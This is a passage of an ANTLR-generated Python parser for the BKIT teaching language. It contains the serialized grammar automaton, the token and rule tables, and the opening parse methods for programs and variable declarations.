buf.write(\"x\\3\\2\\2\\2xz\\3\\2\\2\\2yw\\3\\2\\2\\2z{\\7\\25\\2\\2{|\\7A\\2\\2|\\7\\3\")\n buf.write(\"\\2\\2\\2}~\\5\\16\\b\\2~\\177\\7B\\2\\2\\177\\u0081\\3\\2\\2\\2\\u0080\")\n buf.write(\"}\\3\\2\\2\\2\\u0081\\u0084\\3\\2\\2\\2\\u0082\\u0080\\3\\2\\2\\2\\u0082\")\n buf.write(\"\\u0083\\3\\2\\2\\2\\u0083\\u0088\\3\\2\\2\\2\\u0084\\u0082\\3\\2\\2\\2\")\n buf.write(\"\\u0085\\u0087\\5\\n\\6\\2\\u0086\\u0085\\3\\2\\2\\2\\u0087\\u008a\\3\")\n buf.write(\"\\2\\2\\2\\u0088\\u0086\\3\\2\\2\\2\\u0088\\u0089\\3\\2\\2\\2\\u0089\\t\")\n buf.write(\"\\3\\2\\2\\2\\u008a\\u0088\\3\\2\\2\\2\\u008b\\u009f\\5\\f\\7\\2\\u008c\")\n buf.write(\"\\u009f\\5\\20\\t\\2\\u008d\\u009f\\5\\22\\n\\2\\u008e\\u009f\\5\\24\")\n buf.write(\"\\13\\2\\u008f\\u0090\\5\\26\\f\\2\\u0090\\u0091\\7B\\2\\2\\u0091\\u009f\")\n buf.write(\"\\3\\2\\2\\2\\u0092\\u0093\\5\\30\\r\\2\\u0093\\u0094\\7B\\2\\2\\u0094\")\n buf.write(\"\\u009f\\3\\2\\2\\2\\u0095\\u0096\\5\\32\\16\\2\\u0096\\u0097\\7B\\2\")\n buf.write(\"\\2\\u0097\\u009f\\3\\2\\2\\2\\u0098\\u0099\\5\\34\\17\\2\\u0099\\u009a\")\n buf.write(\"\\7B\\2\\2\\u009a\\u009f\\3\\2\\2\\2\\u009b\\u009c\\5\\36\\20\\2\\u009c\")\n buf.write(\"\\u009d\\7B\\2\\2\\u009d\\u009f\\3\\2\\2\\2\\u009e\\u008b\\3\\2\\2\\2\")\n buf.write(\"\\u009e\\u008c\\3\\2\\2\\2\\u009e\\u008d\\3\\2\\2\\2\\u009e\\u008e\\3\")\n buf.write(\"\\2\\2\\2\\u009e\\u008f\\3\\2\\2\\2\\u009e\\u0092\\3\\2\\2\\2\\u009e\\u0095\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u0098\\3\\2\\2\\2\\u009e\\u009b\\3\\2\\2\\2\\u009f\")\n buf.write(\"\\13\\3\\2\\2\\2\\u00a0\\u00a1\\7\\32\\2\\2\\u00a1\\u00a2\\5 \\21\\2\\u00a2\")\n buf.write(\"\\u00a3\\7\\35\\2\\2\\u00a3\\u00ab\\5\\b\\5\\2\\u00a4\\u00a5\\7\\23\\2\")\n buf.write(\"\\2\\u00a5\\u00a6\\5 \\21\\2\\u00a6\\u00a7\\7\\35\\2\\2\\u00a7\\u00a8\")\n buf.write(\"\\5\\b\\5\\2\\u00a8\\u00aa\\3\\2\\2\\2\\u00a9\\u00a4\\3\\2\\2\\2\\u00aa\")\n buf.write(\"\\u00ad\\3\\2\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\\3\\2\\2\\2\")\n buf.write(\"\\u00ac\\u00b0\\3\\2\\2\\2\\u00ad\\u00ab\\3\\2\\2\\2\\u00ae\\u00af\\7\")\n buf.write(\"\\22\\2\\2\\u00af\\u00b1\\5\\b\\5\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\")\n buf.write(\"\\u00b1\\3\\2\\2\\2\\u00b1\\u00b2\\3\\2\\2\\2\\u00b2\\u00b3\\7\\24\\2\")\n buf.write(\"\\2\\u00b3\\u00b4\\7A\\2\\2\\u00b4\\r\\3\\2\\2\\2\\u00b5\\u00b6\\5\\4\")\n buf.write(\"\\3\\2\\u00b6\\17\\3\\2\\2\\2\\u00b7\\u00b8\\7\\30\\2\\2\\u00b8\\u00b9\")\n buf.write(\"\\7:\\2\\2\\u00b9\\u00ba\\7\\3\\2\\2\\u00ba\\u00bb\\7D\\2\\2\\u00bb\\u00bc\")\n buf.write(\"\\5 \\21\\2\\u00bc\\u00bd\\7C\\2\\2\\u00bd\\u00be\\5 \\21\\2\\u00be\")\n buf.write(\"\\u00bf\\7C\\2\\2\\u00bf\\u00c0\\5 \\21\\2\\u00c0\\u00c1\\7;\\2\\2\\u00c1\")\n buf.write(\"\\u00c2\\7\\21\\2\\2\\u00c2\\u00c3\\5\\b\\5\\2\\u00c3\\u00c4\\7\\26\\2\")\n buf.write(\"\\2\\u00c4\\u00c5\\7A\\2\\2\\u00c5\\21\\3\\2\\2\\2\\u00c6\\u00c7\\7\\37\")\n buf.write(\"\\2\\2\\u00c7\\u00c8\\5 \\21\\2\\u00c8\\u00c9\\7\\21\\2\\2\\u00c9\\u00ca\")\n buf.write(\"\\5\\b\\5\\2\\u00ca\\u00cb\\7\\27\\2\\2\\u00cb\\u00cc\\7A\\2\\2\\u00cc\")\n buf.write(\"\\23\\3\\2\\2\\2\\u00cd\\u00ce\\7\\21\\2\\2\\u00ce\\u00cf\\5\\b\\5\\2\\u00cf\")\n buf.write(\"\\u00d0\\7\\37\\2\\2\\u00d0\\u00d1\\5 \\21\\2\\u00d1\\u00d2\\7\\\"\\2\")\n buf.write(\"\\2\\u00d2\\u00d3\\7A\\2\\2\\u00d3\\25\\3\\2\\2\\2\\u00d4\\u00d7\\5.\")\n buf.write(\"\\30\\2\\u00d5\\u00d7\\7\\3\\2\\2\\u00d6\\u00d4\\3\\2\\2\\2\\u00d6\\u00d5\")\n buf.write(\"\\3\\2\\2\\2\\u00d7\\u00d8\\3\\2\\2\\2\\u00d8\\u00d9\\7D\\2\\2\\u00d9\")\n buf.write(\"\\u00da\\5 \\21\\2\\u00da\\27\\3\\2\\2\\2\\u00db\\u00dc\\7\\17\\2\\2\\u00dc\")\n buf.write(\"\\31\\3\\2\\2\\2\\u00dd\\u00de\\7\\20\\2\\2\\u00de\\33\\3\\2\\2\\2\\u00df\")\n buf.write(\"\\u00e0\\7\\3\\2\\2\\u00e0\\u00eb\\7:\\2\\2\\u00e1\\u00e6\\5 \\21\\2\")\n buf.write(\"\\u00e2\\u00e3\\7C\\2\\2\\u00e3\\u00e5\\5 \\21\\2\\u00e4\\u00e2\\3\")\n buf.write(\"\\2\\2\\2\\u00e5\\u00e8\\3\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\")\n buf.write(\"\\3\\2\\2\\2\\u00e7\\u00ea\\3\\2\\2\\2\\u00e8\\u00e6\\3\\2\\2\\2\\u00e9\")\n buf.write(\"\\u00e1\\3\\2\\2\\2\\u00ea\\u00ed\\3\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\")\n buf.write(\"\\u00eb\\u00ec\\3\\2\\2\\2\\u00ec\\u00ee\\3\\2\\2\\2\\u00ed\\u00eb\\3\")\n buf.write(\"\\2\\2\\2\\u00ee\\u00ef\\7;\\2\\2\\u00ef\\35\\3\\2\\2\\2\\u00f0\\u00f2\")\n buf.write(\"\\7\\34\\2\\2\\u00f1\\u00f3\\5 \\21\\2\\u00f2\\u00f1\\3\\2\\2\\2\\u00f2\")\n buf.write(\"\\u00f3\\3\\2\\2\\2\\u00f3\\37\\3\\2\\2\\2\\u00f4\\u00f5\\5\\\"\\22\\2\\u00f5\")\n buf.write(\"\\u00f6\\7\\4\\2\\2\\u00f6\\u00f7\\5\\\"\\22\\2\\u00f7\\u00fa\\3\\2\\2\")\n buf.write(\"\\2\\u00f8\\u00fa\\5\\\"\\22\\2\\u00f9\\u00f4\\3\\2\\2\\2\\u00f9\\u00f8\")\n buf.write(\"\\3\\2\\2\\2\\u00fa!\\3\\2\\2\\2\\u00fb\\u00fc\\b\\22\\1\\2\\u00fc\\u00fd\")\n buf.write(\"\\5$\\23\\2\\u00fd\\u0103\\3\\2\\2\\2\\u00fe\\u00ff\\f\\4\\2\\2\\u00ff\")\n buf.write(\"\\u0100\\7\\5\\2\\2\\u0100\\u0102\\5$\\23\\2\\u0101\\u00fe\\3\\2\\2\\2\")\n buf.write(\"\\u0102\\u0105\\3\\2\\2\\2\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\")\n buf.write(\"\\2\\2\\2\\u0104#\\3\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0107\")\n buf.write(\"\\b\\23\\1\\2\\u0107\\u0108\\5&\\24\\2\\u0108\\u010e\\3\\2\\2\\2\\u0109\")\n buf.write(\"\\u010a\\f\\4\\2\\2\\u010a\\u010b\\7\\6\\2\\2\\u010b\\u010d\\5&\\24\\2\")\n buf.write(\"\\u010c\\u0109\\3\\2\\2\\2\\u010d\\u0110\\3\\2\\2\\2\\u010e\\u010c\\3\")\n buf.write(\"\\2\\2\\2\\u010e\\u010f\\3\\2\\2\\2\\u010f%\\3\\2\\2\\2\\u0110\\u010e\")\n buf.write(\"\\3\\2\\2\\2\\u0111\\u0112\\b\\24\\1\\2\\u0112\\u0113\\5(\\25\\2\\u0113\")\n buf.write(\"\\u0119\\3\\2\\2\\2\\u0114\\u0115\\f\\4\\2\\2\\u0115\\u0116\\7\\7\\2\\2\")\n buf.write(\"\\u0116\\u0118\\5(\\25\\2\\u0117\\u0114\\3\\2\\2\\2\\u0118\\u011b\\3\")\n buf.write(\"\\2\\2\\2\\u0119\\u0117\\3\\2\\2\\2\\u0119\\u011a\\3\\2\\2\\2\\u011a\\'\")\n buf.write(\"\\3\\2\\2\\2\\u011b\\u0119\\3\\2\\2\\2\\u011c\\u011d\\7\\b\\2\\2\\u011d\")\n buf.write(\"\\u0120\\5(\\25\\2\\u011e\\u0120\\5*\\26\\2\\u011f\\u011c\\3\\2\\2\\2\")\n buf.write(\"\\u011f\\u011e\\3\\2\\2\\2\\u0120)\\3\\2\\2\\2\\u0121\\u0122\\7\\t\\2\")\n buf.write(\"\\2\\u0122\\u0125\\5*\\26\\2\\u0123\\u0125\\5,\\27\\2\\u0124\\u0121\")\n buf.write(\"\\3\\2\\2\\2\\u0124\\u0123\\3\\2\\2\\2\\u0125+\\3\\2\\2\\2\\u0126\\u0129\")\n buf.write(\"\\5.\\30\\2\\u0127\\u0129\\5\\60\\31\\2\\u0128\\u0126\\3\\2\\2\\2\\u0128\")\n buf.write(\"\\u0127\\3\\2\\2\\2\\u0129-\\3\\2\\2\\2\\u012a\\u012f\\5\\60\\31\\2\\u012b\")\n buf.write(\"\\u012c\\7<\\2\\2\\u012c\\u012d\\5 \\21\\2\\u012d\\u012e\\7=\\2\\2\\u012e\")\n buf.write(\"\\u0130\\3\\2\\2\\2\\u012f\\u012b\\3\\2\\2\\2\\u0130\\u0131\\3\\2\\2\\2\")\n buf.write(\"\\u0131\\u012f\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132/\\3\\2\\2\")\n buf.write(\"\\2\\u0133\\u0136\\5\\66\\34\\2\\u0134\\u0136\\5\\62\\32\\2\\u0135\\u0133\")\n buf.write(\"\\3\\2\\2\\2\\u0135\\u0134\\3\\2\\2\\2\\u0136\\61\\3\\2\\2\\2\\u0137\\u013d\")\n buf.write(\"\\5\\64\\33\\2\\u0138\\u0139\\7:\\2\\2\\u0139\\u013a\\5 \\21\\2\\u013a\")\n buf.write(\"\\u013b\\7;\\2\\2\\u013b\\u013d\\3\\2\\2\\2\\u013c\\u0137\\3\\2\\2\\2\")\n buf.write(\"\\u013c\\u0138\\3\\2\\2\\2\\u013d\\63\\3\\2\\2\\2\\u013e\\u0142\\7\\3\")\n buf.write(\"\\2\\2\\u013f\\u0142\\5<\\37\\2\\u0140\\u0142\\5> \\2\\u0141\\u013e\")\n buf.write(\"\\3\\2\\2\\2\\u0141\\u013f\\3\\2\\2\\2\\u0141\\u0140\\3\\2\\2\\2\\u0142\")\n buf.write(\"\\65\\3\\2\\2\\2\\u0143\\u0144\\7\\3\\2\\2\\u0144\\u014f\\7:\\2\\2\\u0145\")\n buf.write(\"\\u014a\\5 \\21\\2\\u0146\\u0147\\7C\\2\\2\\u0147\\u0149\\5 \\21\\2\")\n buf.write(\"\\u0148\\u0146\\3\\2\\2\\2\\u0149\\u014c\\3\\2\\2\\2\\u014a\\u0148\\3\")\n buf.write(\"\\2\\2\\2\\u014a\\u014b\\3\\2\\2\\2\\u014b\\u014e\\3\\2\\2\\2\\u014c\\u014a\")\n buf.write(\"\\3\\2\\2\\2\\u014d\\u0145\\3\\2\\2\\2\\u014e\\u0151\\3\\2\\2\\2\\u014f\")\n buf.write(\"\\u014d\\3\\2\\2\\2\\u014f\\u0150\\3\\2\\2\\2\\u0150\\u0152\\3\\2\\2\\2\")\n buf.write(\"\\u0151\\u014f\\3\\2\\2\\2\\u0152\\u0153\\7;\\2\\2\\u0153\\67\\3\\2\\2\")\n buf.write(\"\\2\\u0154\\u0155\\7<\\2\\2\\u0155\\u0156\\5 \\21\\2\\u0156\\u0157\")\n buf.write(\"\\7=\\2\\2\\u0157\\u015e\\3\\2\\2\\2\\u0158\\u0159\\7<\\2\\2\\u0159\\u015a\")\n buf.write(\"\\5 \\21\\2\\u015a\\u015b\\7=\\2\\2\\u015b\\u015c\\58\\35\\2\\u015c\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u015d\\u0154\\3\\2\\2\\2\\u015d\\u0158\\3\\2\\2\\2\")\n buf.write(\"\\u015e9\\3\\2\\2\\2\\u015f\\u0160\\7\\3\\2\\2\\u0160\\u0161\\7D\\2\\2\")\n buf.write(\"\\u0161\\u0162\\5> \\2\\u0162;\\3\\2\\2\\2\\u0163\\u0164\\t\\2\\2\\2\")\n buf.write(\"\\u0164=\\3\\2\\2\\2\\u0165\\u0174\\7>\\2\\2\\u0166\\u0169\\5<\\37\\2\")\n buf.write(\"\\u0167\\u0169\\5> \\2\\u0168\\u0166\\3\\2\\2\\2\\u0168\\u0167\\3\\2\")\n buf.write(\"\\2\\2\\u0169\\u0171\\3\\2\\2\\2\\u016a\\u016d\\7C\\2\\2\\u016b\\u016e\")\n buf.write(\"\\5<\\37\\2\\u016c\\u016e\\5> \\2\\u016d\\u016b\\3\\2\\2\\2\\u016d\\u016c\")\n buf.write(\"\\3\\2\\2\\2\\u016e\\u0170\\3\\2\\2\\2\\u016f\\u016a\\3\\2\\2\\2\\u0170\")\n buf.write(\"\\u0173\\3\\2\\2\\2\\u0171\\u016f\\3\\2\\2\\2\\u0171\\u0172\\3\\2\\2\\2\")\n buf.write(\"\\u0172\\u0175\\3\\2\\2\\2\\u0173\\u0171\\3\\2\\2\\2\\u0174\\u0168\\3\")\n buf.write(\"\\2\\2\\2\\u0174\\u0175\\3\\2\\2\\2\\u0175\\u0176\\3\\2\\2\\2\\u0176\\u0177\")\n buf.write(\"\\7?\\2\\2\\u0177?\\3\\2\\2\\2\\u0178\\u017b\\5D#\\2\\u0179\\u017b\\5\")\n buf.write(\"B\\\"\\2\\u017a\\u0178\\3\\2\\2\\2\\u017a\\u0179\\3\\2\\2\\2\\u017b\\u0183\")\n buf.write(\"\\3\\2\\2\\2\\u017c\\u017f\\7C\\2\\2\\u017d\\u0180\\5D#\\2\\u017e\\u0180\")\n buf.write(\"\\5B\\\"\\2\\u017f\\u017d\\3\\2\\2\\2\\u017f\\u017e\\3\\2\\2\\2\\u0180\")\n buf.write(\"\\u0182\\3\\2\\2\\2\\u0181\\u017c\\3\\2\\2\\2\\u0182\\u0185\\3\\2\\2\\2\")\n buf.write(\"\\u0183\\u0181\\3\\2\\2\\2\\u0183\\u0184\\3\\2\\2\\2\\u0184A\\3\\2\\2\")\n buf.write(\"\\2\\u0185\\u0183\\3\\2\\2\\2\\u0186\\u018a\\7\\3\\2\\2\\u0187\\u0188\")\n buf.write(\"\\7<\\2\\2\\u0188\\u0189\\7\\n\\2\\2\\u0189\\u018b\\7=\\2\\2\\u018a\\u0187\")\n buf.write(\"\\3\\2\\2\\2\\u018b\\u018c\\3\\2\\2\\2\\u018c\\u018a\\3\\2\\2\\2\\u018c\")\n buf.write(\"\\u018d\\3\\2\\2\\2\\u018d\\u0190\\3\\2\\2\\2\\u018e\\u0190\\7\\3\\2\\2\")\n buf.write(\"\\u018f\\u0186\\3\\2\\2\\2\\u018f\\u018e\\3\\2\\2\\2\\u0190\\u0191\\3\")\n buf.write(\"\\2\\2\\2\\u0191\\u0194\\7D\\2\\2\\u0192\\u0195\\5> \\2\\u0193\\u0195\")\n buf.write(\"\\5<\\37\\2\\u0194\\u0192\\3\\2\\2\\2\\u0194\\u0193\\3\\2\\2\\2\\u0195\")\n buf.write(\"C\\3\\2\\2\\2\\u0196\\u019a\\7\\3\\2\\2\\u0197\\u0198\\7<\\2\\2\\u0198\")\n buf.write(\"\\u0199\\7\\n\\2\\2\\u0199\\u019b\\7=\\2\\2\\u019a\\u0197\\3\\2\\2\\2\")\n buf.write(\"\\u019b\\u019c\\3\\2\\2\\2\\u019c\\u019a\\3\\2\\2\\2\\u019c\\u019d\\3\")\n buf.write(\"\\2\\2\\2\\u019d\\u01a0\\3\\2\\2\\2\\u019e\\u01a0\\7\\3\\2\\2\\u019f\\u0196\")\n buf.write(\"\\3\\2\\2\\2\\u019f\\u019e\\3\\2\\2\\2\\u01a0E\\3\\2\\2\\2\\u01a1\\u01a6\")\n buf.write(\"\\7\\3\\2\\2\\u01a2\\u01a3\\7<\\2\\2\\u01a3\\u01a4\\5 \\21\\2\\u01a4\")\n buf.write(\"\\u01a5\\7=\\2\\2\\u01a5\\u01a7\\3\\2\\2\\2\\u01a6\\u01a2\\3\\2\\2\\2\")\n buf.write(\"\\u01a7\\u01a8\\3\\2\\2\\2\\u01a8\\u01a6\\3\\2\\2\\2\\u01a8\\u01a9\\3\")\n buf.write(\"\\2\\2\\2\\u01a9G\\3\\2\\2\\2\\u01aa\\u01ab\\5F$\\2\\u01ab\\u01ac\\7\")\n buf.write(\"D\\2\\2\\u01ac\\u01ad\\5> \\2\\u01adI\\3\\2\\2\\2\\u01ae\\u01af\\7\\3\")\n buf.write(\"\\2\\2\\u01af\\u01b0\\7D\\2\\2\\u01b0\\u01b1\\5<\\37\\2\\u01b1K\\3\\2\")\n buf.write(\"\\2\\2\\u01b2\\u01b7\\5D#\\2\\u01b3\\u01b4\\7C\\2\\2\\u01b4\\u01b6\")\n buf.write(\"\\5D#\\2\\u01b5\\u01b3\\3\\2\\2\\2\\u01b6\\u01b9\\3\\2\\2\\2\\u01b7\\u01b5\")\n buf.write(\"\\3\\2\\2\\2\\u01b7\\u01b8\\3\\2\\2\\2\\u01b8M\\3\\2\\2\\2\\u01b9\\u01b7\")\n buf.write(\"\\3\\2\\2\\2,SYhqw\\u0082\\u0088\\u009e\\u00ab\\u00b0\\u00d6\\u00e6\")\n buf.write(\"\\u00eb\\u00f2\\u00f9\\u0103\\u010e\\u0119\\u011f\\u0124\\u0128\")\n buf.write(\"\\u0131\\u0135\\u013c\\u0141\\u014a\\u014f\\u015d\\u0168\\u016d\")\n buf.write(\"\\u0171\\u0174\\u017a\\u017f\\u0183\\u018c\\u018f\\u0194\\u019c\")\n buf.write(\"\\u019f\\u01a8\\u01b7\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \n \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \"'Return'\", \n \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \"'False'\", \n \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \n \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \n \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \n \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \n \"'int_of_float'\", \"'int_of_string'\", \"'float_to_int'\", \n \"'float_of_string'\", \"'bool_of_string'\", \"'string_of_bool'\", \n \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \n \"MUL_OP\", \"UN_LOGICAL_OP\", \"UN_OP\", \"INT_LIT\", \"FLOAT_LIT\", \n \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \n \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \n \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_stmt_list = 3\n RULE_stmt = 4\n RULE_if_stmt = 5\n RULE_var_declare_stmt = 6\n RULE_for_stmt = 7\n RULE_while_stmt = 8\n RULE_dowhile_stmt = 9\n RULE_assign_stmt = 10\n RULE_break_stmt = 11\n RULE_continue_stmt = 12\n RULE_call_stmt = 13\n RULE_return_stmt = 14\n RULE_expr = 15\n RULE_expr1 = 16\n RULE_expr2 = 17\n RULE_expr3 = 18\n RULE_expr4 = 19\n RULE_expr5 = 20\n RULE_expr6 = 21\n RULE_array_cell = 22\n RULE_expr7 = 23\n RULE_expr8 = 24\n RULE_operand = 25\n RULE_function_call = 26\n RULE_index_op = 27\n RULE_array = 28\n RULE_primitive_data = 29\n RULE_array_lit = 30\n RULE_var_list = 31\n RULE_var_init = 32\n RULE_var_non_init = 33\n RULE_composite_var = 34\n RULE_composite_init = 35\n RULE_primitive_init = 36\n RULE_params_list = 37\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"expr\", \"expr1\", \"expr2\", \n \"expr3\", \"expr4\", \"expr5\", \"expr6\", \"array_cell\", \"expr7\", \n \"expr8\", \"operand\", \"function_call\", \"index_op\", \"array\", \n \"primitive_data\", \"array_lit\", \"var_list\", \"var_init\", \n \"var_non_init\", \"composite_var\", \"composite_init\", \"primitive_init\", \n \"params_list\" ]\n\n EOF = Token.EOF\n ID=1\n REL_OP=2\n BIN_LOGICAL_OP=3\n ADD_OP=4\n MUL_OP=5\n UN_LOGICAL_OP=6\n UN_OP=7\n INT_LIT=8\n FLOAT_LIT=9\n BOOL_LIT=10\n STRING_LIT=11\n BODY=12\n BREAK=13\n CONTINUE=14\n DO=15\n ELSE=16\n ELSEIF=17\n ENDIF=18\n ENDBODY=19\n ENDFOR=20\n ENDWHILE=21\n FOR=22\n FUNCTION=23\n IF=24\n PARAMETER=25\n RETURN=26\n THEN=27\n VAR=28\n WHILE=29\n TRUE=30\n FALSE=31\n ENDDO=32\n PLUS_INT=33\n PLUS_FLOAT=34\n MINUS_INT=35\n MINUS_FLOAT=36\n STAR_INT=37\n STAR_FLOAT=38\n DIV_INT=39\n DIV_FLOAT=40\n MOD=41\n NOT=42\n AND=43\n OR=44\n EQUAL=45\n NOT_EQUAL_INT=46\n LESS_INT=47\n GREATER_INT=48\n LESS_OR_EQUAL_INT=49\n GREATER_OR_EQUAL_INT=50\n NOT_EQUAL_FLOAT=51\n LESS_FLOAT=52\n GREATER_FLOAT=53\n LESS_OR_EQUAL_FLOAT=54\n GREATER_OR_EQUAL_FLOAT=55\n LEFT_PAREN=56\n RIGHT_PAREN=57\n LEFT_BRACKET=58\n RIGHT_BRACKET=59\n LEFT_BRACE=60\n RIGHT_BRACE=61\n COLON=62\n DOT=63\n SEMI=64\n COMMA=65\n ASSIGN=66\n DOUBLE_QUOTE=67\n INT_OF_FLOAT=68\n INT_OF_STRING=69\n FLOAT_TO_INT=70\n FLOAT_OF_STRING=71\n BOOL_OF_STRING=72\n STRING_OF_BOOL=73\n STRING_OF_INT=74\n STRING_OF_FLOAT=75\n COMMENT=76\n WS=77\n ILLEGAL_ESCAPE=78\n UNCLOSE_STRING=79\n UNTERMINATED_COMMENT=80\n ERROR_CHAR=81\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterProgram\" ):\n listener.enterProgram(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitProgram\" ):\n listener.exitProgram(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 76\n self.var_declare()\n self.state = 77\n self.match(BKITParser.SEMI)\n self.state = 83\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 87\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 84\n self.function_declare()\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 90\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_declare\" ):\n listener.enterVar_declare(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_declare\" ):\n listener.exitVar_declare(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 92\n self.match(BKITParser.VAR)\n self.state = 93\n self.match(BKITParser.COLON)\n self.state = 94\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n 